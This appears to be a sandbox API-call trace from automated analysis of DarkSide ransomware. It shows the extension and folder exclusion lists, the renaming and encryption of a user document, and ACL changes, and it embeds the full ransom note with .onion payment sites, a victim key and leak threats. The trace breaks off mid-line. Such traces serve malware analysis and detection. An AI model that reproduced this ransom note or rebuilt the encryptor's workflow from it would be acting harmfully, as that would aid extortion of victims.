wcslen (_String="cmd") returned 0x3 [0148.708] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0148.708] wcslen (_String="com") returned 0x3 [0148.708] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0148.708] wcslen (_String="cpl") returned 0x3 [0148.708] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0148.708] wcslen (_String="cur") returned 0x3 [0148.708] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0148.708] wcslen (_String="deskthemepack") returned 0xd [0148.708] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0148.708] wcslen (_String="diagcab") returned 0x7 [0148.708] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0148.708] wcslen (_String="diagcfg") returned 0x7 [0148.708] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0148.708] wcslen (_String="diagpkg") returned 0x7 [0148.709] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0148.709] wcslen (_String="dll") returned 0x3 [0148.709] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0148.709] wcslen (_String="drv") returned 0x3 [0148.709] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0148.709] wcslen (_String="exe") returned 0x3 [0148.709] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0148.709] wcslen (_String="hlp") returned 0x3 [0148.709] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0148.709] wcslen (_String="icl") returned 0x3 [0148.709] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0148.709] wcslen (_String="icns") returned 0x4 [0148.709] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0148.709] wcslen (_String="ico") returned 0x3 [0148.709] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0148.709] wcslen (_String="ics") returned 0x3 [0148.709] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0148.709] wcslen (_String="idx") returned 0x3 [0148.709] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0148.709] wcslen (_String="ldf") returned 0x3 [0148.709] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0148.709] wcslen (_String="lnk") returned 0x3 [0148.709] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0148.709] wcslen (_String="mod") returned 0x3 [0148.709] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0148.709] wcslen (_String="mpa") returned 0x3 [0148.709] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0148.709] wcslen (_String="msc") returned 0x3 [0148.709] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0148.709] wcslen (_String="msp") returned 0x3 [0148.709] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0148.709] wcslen (_String="msstyles") returned 0x8 [0148.709] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0148.709] wcslen (_String="msu") returned 0x3 [0148.710] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0148.710] wcslen (_String="nls") returned 0x3 [0148.710] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0148.710] wcslen (_String="nomedia") returned 0x7 [0148.710] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0148.710] wcslen (_String="ocx") returned 0x3 [0148.710] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0148.710] wcslen (_String="prf") returned 0x3 [0148.710] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0148.710] wcslen (_String="ps1") returned 0x3 [0148.710] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0148.710] wcslen (_String="rom") returned 0x3 [0148.710] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0148.710] wcslen (_String="rtp") returned 0x3 [0148.710] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0148.710] wcslen (_String="scr") returned 0x3 [0148.710] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0148.710] wcslen (_String="shs") returned 0x3 [0148.710] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0148.710] wcslen (_String="spl") returned 0x3 [0148.710] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0148.710] wcslen (_String="sys") returned 0x3 [0148.710] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0148.710] wcslen (_String="theme") returned 0x5 [0148.710] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0148.710] wcslen (_String="themepack") returned 0x9 [0148.710] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0148.710] wcslen (_String="wpx") returned 0x3 [0148.710] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0148.710] wcslen (_String="lock") returned 0x4 [0148.710] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0148.710] wcslen (_String="key") returned 0x3 [0148.710] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0148.710] wcslen (_String="hta") returned 0x3 [0148.711] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0148.711] wcslen (_String="msi") returned 0x3 [0148.711] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0148.711] wcslen (_String="pdb") returned 0x3 [0148.711] _wcsicmp (_Str1="sql", _Str2="docx") returned 15 [0148.711] wcslen (_String="sql") returned 0x3 [0148.711] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0148.711] wcslen (_String="sqlite") returned 0x6 [0148.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.711] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.711] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.711] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.711] wcscpy (in: _Dest=0x44d00d0, _Source="0_azADN_kj_yk z3GUN.docx" | out: _Dest="0_azADN_kj_yk z3GUN.docx") returned="0_azADN_kj_yk z3GUN.docx" [0148.711] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx", dwFileAttributes=0x80) returned 1 [0148.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0_azadn_kj_yk z3gun.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0148.711] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.711] ReadFile (in: hFile=0x13c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.712] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xe9ff9eac [0148.712] RtlComputeCrc32 (PartialCrc=0x9eac, Buffer=0x3feb74, Length=0x80) returned 0xd0bb026e [0148.712] RtlComputeCrc32 (PartialCrc=0x26e, Buffer=0x3feb74, Length=0x80) returned 0x8ede3772 [0148.712] RtlComputeCrc32 (PartialCrc=0x3772, Buffer=0x3feb74, Length=0x80) returned 0x64cbb162 [0148.712] RtlComputeCrc32 (PartialCrc=0xb162, Buffer=0x3feb74, Length=0x80) returned 0xf10f6b39 [0148.712] CloseHandle (hObject=0x13c) returned 1 [0148.712] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.712] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx" [0148.712] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx") returned 0x44 [0148.713] wcscpy (in: _Dest=0x44e0108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.713] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0_azadn_kj_yk z3gun.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0_azadn_kj_yk z3gun.docx.c06622a1"), dwFlags=0x8) returned 1 [0148.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0_azADN_kj_yk z3GUN.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0_azadn_kj_yk z3gun.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0148.722] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.722] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x407672f0 [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d4ef8b7 [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c7e1cca [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1042d1e [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3c9aaa89 [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe2a6f42 [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x17ac6fd8 [0148.727] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5572305a [0148.730] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xf10e3157 [0148.730] RtlComputeCrc32 (PartialCrc=0x3157, Buffer=0x2f30094, Length=0x80) returned 0xf2d7df34 [0148.730] RtlComputeCrc32 (PartialCrc=0xdf34, Buffer=0x2f30094, Length=0x80) returned 0xc5052ed7 [0148.730] RtlComputeCrc32 (PartialCrc=0x2ed7, Buffer=0x2f30094, Length=0x80) returned 0x73ce9901 [0148.730] RtlComputeCrc32 (PartialCrc=0x9901, Buffer=0x2f30094, Length=0x80) returned 0x65a05898 [0148.731] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.731] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.731] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.731] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x374f4230, ftCreationTime.dwHighDateTime=0x1d5d906, ftLastAccessTime.dwLowDateTime=0x7b39bf00, ftLastAccessTime.dwHighDateTime=0x1d5e628, ftLastWriteTime.dwLowDateTime=0x7b39bf00, ftLastWriteTime.dwHighDateTime=0x1d5e628, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2tfUDBdxmf64_w", cAlternateFileName="2TFUDB~1")) returned 1 [0148.731] _wcsicmp (_Str1="$recycle.bin", _Str2="2tfUDBdxmf64_w") returned -14 [0148.731] wcslen (_String="$recycle.bin") returned 0xc [0148.731] _wcsicmp (_Str1="config.msi", _Str2="2tfUDBdxmf64_w") returned 49 [0148.731] wcslen (_String="config.msi") returned 0xa [0148.731] _wcsicmp (_Str1="$windows.~bt", _Str2="2tfUDBdxmf64_w") returned -14 [0148.731] wcslen (_String="$windows.~bt") returned 0xc [0148.731] _wcsicmp (_Str1="$windows.~ws", _Str2="2tfUDBdxmf64_w") returned -14 [0148.731] wcslen (_String="$windows.~ws") returned 0xc [0148.731] _wcsicmp (_Str1="windows", _Str2="2tfUDBdxmf64_w") returned 69 [0148.731] wcslen (_String="windows") returned 0x7 [0148.731] _wcsicmp (_Str1="appdata", _Str2="2tfUDBdxmf64_w") returned 47 [0148.731] wcslen (_String="appdata") returned 0x7 [0148.731] _wcsicmp (_Str1="application data", _Str2="2tfUDBdxmf64_w") returned 47 [0148.731] wcslen (_String="application data") returned 0x10 [0148.731] _wcsicmp (_Str1="boot", _Str2="2tfUDBdxmf64_w") returned 48 [0148.731] wcslen (_String="boot") returned 0x4 [0148.731] _wcsicmp (_Str1="google", _Str2="2tfUDBdxmf64_w") returned 53 [0148.731] wcslen (_String="google") returned 0x6 [0148.731] _wcsicmp (_Str1="mozilla", _Str2="2tfUDBdxmf64_w") returned 59 [0148.731] wcslen (_String="mozilla") returned 0x7 [0148.731] _wcsicmp (_Str1="program files", _Str2="2tfUDBdxmf64_w") returned 62 [0148.731] wcslen (_String="program files") returned 0xd [0148.731] _wcsicmp (_Str1="program files (x86)", _Str2="2tfUDBdxmf64_w") returned 62 [0148.731] wcslen (_String="program files (x86)") returned 0x13 [0148.731] _wcsicmp (_Str1="programdata", _Str2="2tfUDBdxmf64_w") returned 62 [0148.731] wcslen (_String="programdata") returned 0xb [0148.731] _wcsicmp (_Str1="system volume information", _Str2="2tfUDBdxmf64_w") returned 65 [0148.731] wcslen (_String="system volume information") returned 0x19 [0148.731] _wcsicmp (_Str1="tor browser", _Str2="2tfUDBdxmf64_w") returned 66 [0148.731] wcslen (_String="tor browser") returned 0xb [0148.732] _wcsicmp (_Str1="windows.old", _Str2="2tfUDBdxmf64_w") returned 69 [0148.732] wcslen (_String="windows.old") returned 0xb [0148.732] _wcsicmp (_Str1="intel", _Str2="2tfUDBdxmf64_w") returned 55 [0148.732] wcslen (_String="intel") returned 0x5 [0148.732] _wcsicmp (_Str1="msocache", _Str2="2tfUDBdxmf64_w") returned 59 [0148.732] wcslen (_String="msocache") returned 0x8 [0148.732] _wcsicmp (_Str1="perflogs", _Str2="2tfUDBdxmf64_w") returned 62 [0148.732] wcslen (_String="perflogs") returned 0x8 [0148.732] _wcsicmp (_Str1="x64dbg", _Str2="2tfUDBdxmf64_w") returned 70 [0148.732] wcslen (_String="x64dbg") returned 0x6 [0148.732] _wcsicmp (_Str1="public", _Str2="2tfUDBdxmf64_w") returned 62 [0148.732] wcslen (_String="public") returned 0x6 [0148.732] _wcsicmp (_Str1="all users", _Str2="2tfUDBdxmf64_w") returned 47 [0148.732] wcslen (_String="all users") returned 0x9 [0148.732] _wcsicmp (_Str1="default", _Str2="2tfUDBdxmf64_w") returned 50 [0148.732] wcslen (_String="default") returned 0x7 [0148.732] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0148.732] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0148.732] wcscpy (in: _Dest=0x44b00c0, _Source="2tfUDBdxmf64_w" | out: _Dest="2tfUDBdxmf64_w") returned="2tfUDBdxmf64_w" [0148.732] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.732] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.733] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" [0148.733] GetNamedSecurityInfoW () returned 0x0 [0148.733] SetEntriesInAclW () returned 0x0 [0148.733] SetNamedSecurityInfoW () returned 0x0 [0148.744] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d573d8) returned 1 [0148.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0148.744] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w")) returned 1 [0148.744] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0148.744] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0148.744] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0148.745] CloseHandle (hObject=0x1c) returned 1 [0148.746] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0148.746] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w")) returned 0x10 [0148.746] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\") returned="" [0148.746] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\") returned 0x3b [0148.746] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0148.746] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x374f4230, ftCreationTime.dwHighDateTime=0x1d5d906, ftLastAccessTime.dwLowDateTime=0xd744fc20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd744fc20, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.747] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4de92dd0, ftCreationTime.dwHighDateTime=0x1d5dff0, ftLastAccessTime.dwLowDateTime=0x2965d5d0, ftLastAccessTime.dwHighDateTime=0x1d5e0e5, ftLastWriteTime.dwLowDateTime=0x2965d5d0, ftLastWriteTime.dwHighDateTime=0x1d5e0e5, nFileSizeHigh=0x0, nFileSizeLow=0x18865, dwReserved0=0x0, dwReserved1=0x0, cFileName="g7mZ8kCwoJpt1.pps", cAlternateFileName="G7MZ8K~1.PPS")) returned 1 [0148.747] _wcsicmp (_Str1="g7mZ8kCwoJpt1.pps", _Str2="README.c06622a1.TXT") returned -11 [0148.747] wcsstr (_Str="g7mZ8kCwoJpt1.pps", _SubStr="README") returned 0x0 [0148.747] _wcsicmp (_Str1="autorun.inf", _Str2="g7mZ8kCwoJpt1.pps") returned -6 [0148.747] wcslen (_String="autorun.inf") returned 0xb [0148.747] _wcsicmp (_Str1="boot.ini", _Str2="g7mZ8kCwoJpt1.pps") returned -5 [0148.747] wcslen (_String="boot.ini") returned 0x8 [0148.747] _wcsicmp (_Str1="bootfont.bin", _Str2="g7mZ8kCwoJpt1.pps") returned -5 [0148.747] wcslen (_String="bootfont.bin") returned 0xc [0148.747] _wcsicmp (_Str1="bootsect.bak", _Str2="g7mZ8kCwoJpt1.pps") returned -5 [0148.747] wcslen (_String="bootsect.bak") returned 0xc [0148.747] _wcsicmp (_Str1="desktop.ini", _Str2="g7mZ8kCwoJpt1.pps") returned -3 [0148.747] wcslen (_String="desktop.ini") returned 0xb [0148.747] _wcsicmp (_Str1="iconcache.db", _Str2="g7mZ8kCwoJpt1.pps") returned 2 [0148.747] wcslen (_String="iconcache.db") returned 0xc [0148.747] _wcsicmp (_Str1="ntldr", _Str2="g7mZ8kCwoJpt1.pps") returned 7 [0148.747] wcslen (_String="ntldr") returned 0x5 [0148.747] _wcsicmp (_Str1="ntuser.dat", _Str2="g7mZ8kCwoJpt1.pps") returned 7 [0148.747] wcslen (_String="ntuser.dat") returned 0xa [0148.747] _wcsicmp (_Str1="ntuser.dat.log", _Str2="g7mZ8kCwoJpt1.pps") returned 7 [0148.747] wcslen (_String="ntuser.dat.log") returned 0xe [0148.747] _wcsicmp (_Str1="ntuser.ini", _Str2="g7mZ8kCwoJpt1.pps") returned 7 [0148.748] wcslen (_String="ntuser.ini") returned 0xa [0148.748] _wcsicmp (_Str1="thumbs.db", _Str2="g7mZ8kCwoJpt1.pps") returned 13 [0148.748] wcslen (_String="thumbs.db") returned 0x9 [0148.748] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0148.748] wcslen (_String="386") returned 0x3 [0148.748] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0148.748] wcslen (_String="adv") returned 0x3 [0148.748] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0148.748] wcslen (_String="ani") returned 0x3 [0148.748] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0148.748] wcslen (_String="bat") returned 0x3 [0148.748] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0148.748] wcslen (_String="bin") returned 0x3 [0148.748] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0148.748] wcslen (_String="cab") returned 0x3 [0148.748] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0148.748] wcslen (_String="cmd") returned 0x3 [0148.748] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0148.748] wcslen (_String="com") returned 0x3 [0148.748] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0148.748] wcslen (_String="cpl") returned 0x3 [0148.748] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0148.748] wcslen (_String="cur") returned 0x3 [0148.748] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0148.748] wcslen (_String="deskthemepack") returned 0xd [0148.748] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0148.748] wcslen (_String="diagcab") returned 0x7 [0148.748] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0148.748] wcslen (_String="diagcfg") returned 0x7 [0148.748] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0148.748] wcslen (_String="diagpkg") returned 0x7 [0148.748] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0148.748] wcslen (_String="dll") returned 0x3 [0148.748] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0148.748] wcslen (_String="drv") returned 0x3 [0148.748] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0148.748] wcslen (_String="exe") returned 0x3 [0148.748] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0148.749] wcslen (_String="hlp") returned 0x3 [0148.749] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0148.749] wcslen (_String="icl") returned 0x3 [0148.749] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0148.749] wcslen (_String="icns") returned 0x4 [0148.749] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0148.749] wcslen (_String="ico") returned 0x3 [0148.749] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0148.749] wcslen (_String="ics") returned 0x3 [0148.749] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0148.749] wcslen (_String="idx") returned 0x3 [0148.749] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0148.749] wcslen (_String="ldf") returned 0x3 [0148.749] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0148.749] wcslen (_String="lnk") returned 0x3 [0148.749] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0148.749] wcslen (_String="mod") returned 0x3 [0148.749] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0148.749] wcslen (_String="mpa") returned 0x3 [0148.749] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0148.749] wcslen (_String="msc") returned 0x3 [0148.749] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0148.749] wcslen (_String="msp") returned 0x3 [0148.749] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0148.749] wcslen (_String="msstyles") returned 0x8 [0148.749] _wcsicmp 